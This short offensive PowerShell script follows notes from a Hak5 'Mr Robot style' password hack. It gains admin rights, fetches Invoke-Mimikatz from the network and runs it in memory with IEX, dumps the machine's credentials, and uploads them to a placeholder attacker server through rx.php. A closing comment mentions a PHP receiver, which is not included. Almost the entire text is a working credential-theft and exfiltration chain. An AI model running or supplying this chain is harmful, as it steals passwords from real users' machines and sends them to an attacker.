#based on notes from https://www.hak5.org/blog/15-second-password-hack-mr-robot-style
#Start CMD as Admin
powershell Start-Process cmd -Verb runAs

#get "Invoke Minikatz
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1');

#Dump to var
$output = Invoke-Mimikatz -DumpCreds;

#upload output
(New-Object Net.WebClient).UploadString('http://<server>/rx.php', $output)"

#simple PHP dump to file with timestamp